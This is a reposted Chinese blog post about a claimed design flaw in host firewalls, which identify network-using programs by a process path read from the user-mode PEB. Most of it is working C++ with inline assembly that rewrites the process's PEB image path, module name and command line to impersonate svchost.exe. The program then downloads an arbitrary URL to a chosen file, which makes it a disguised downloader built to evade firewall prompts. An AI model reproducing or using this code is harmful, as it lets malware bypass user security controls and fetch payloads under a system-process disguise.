防火墙普遍存在的设计缺陷--关于进程路径的获取

 http://blog.csdn.net/RonCha/archive/2006/09/20/1254982.aspx

 

当程序访问网络时,一般情况下防火墙都会获取到程序的路径,并提示用户。
问题就出在获取程序路径的方法,一般的防火墙程序都是直接在ring3下获取这些信息,也就是说防火墙程序获取的这些信息,基本上是程序的PEB中存放的信息。如果我们修改了程序的PEB中相关的路径的信息的话,把程序修改伪装为系统进程的路径的话,防火墙就无法正确识别了。

DEMO代码如下,如需更完整的信息请与我联系:

//  fuckdown.cpp : Defines the entry point for the console application.
//
//   [9/19/2006 RonCha]
#include  " stdafx.h "
#include 
< urlmon.h >
#pragma  comment(lib,"urlmon.lib")

char  szpath[MAX_PATH] = {0} ;
OLECHAR path[MAX_PATH]
= {0} ;


void  ChangPath();

int  main( int  argc,  char *  argv[])
{

    
//修改路径
    ChangPath();
    
if (argc==3)
    
{
         
if (argv[1]!="" && argv[2]!="")
         
{
            HRESULT hRet
=URLDownloadToFileA(NULL,argv[1],argv[2],NULL,NULL);
            
if(hRet==S_OK)
                printf(
" Down Success! ");
            
else
                printf(
" Can't down the file! ");
            
return 1;
         }

    }

    printf(
"Author:RonCha ");
    printf(
"Web:http://blog.csdn.net/RonCha ");
    printf(
"Usage:fuckdown.exe downurl savepath ");
    
return 0;
}


void  ChangPath()
{
    
//将该进程伪装为svchost.exe
    int slen;
    slen
=GetSystemDirectory(szpath,MAX_PATH);
    slen
=GetSystemDirectory(szpath,slen);
    lstrcat(szpath,
"/svchost.exe");
    
//转化为Unicode字符
    MultiByteToWideChar(CP_ACP,NULL,szpath,-1,path,MAX_PATH);
    __asm
    
{            
            MOV EAX, fs:[30h]            
//get the PEB address
            MOV EAX, [EAX+0xC]             //_PEB_LDR_DATA
            MOV EAX, [EAX+0xC]             //InLoadOrderModuleList
            lea ebx,path
            mov WORD ptr[EAX
+0x24],0x60  //FullDllName->Length
            mov [EAX+0x28],ebx             //FullDllName->Buffer
            MOV EAX, fs:[30h]
            mov EAX,[EAX
+0x10]           //peb->_RTL_USER_PROCESS_PARAMETERS 
            lea EAX,[EAX+0x3c]             //_RTL_USER_PROCESS_PARAMETERS ->ImagePathName->Buffer
            lea ebx,path
            mov [eax],ebx                 
//ImagePathName->Buffer
            mov WORD ptr[eax-4],0x60     //ImagePathName->Length
            MOV EAX, fs:[30h]
            mov EAX,[EAX
+0x10]           //peb->_RTL_USER_PROCESS_PARAMETERS 
            lea eax,[EAX+0x44]             //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
            lea ebx,path
            mov [eax],ebx                
//CommandLine-->Buffer
            mov WORD ptr[eax-4],0x60    //CommandLine-->Length
    }

}

你可能感兴趣的:(Web,网络,防火墙,user,null,Path)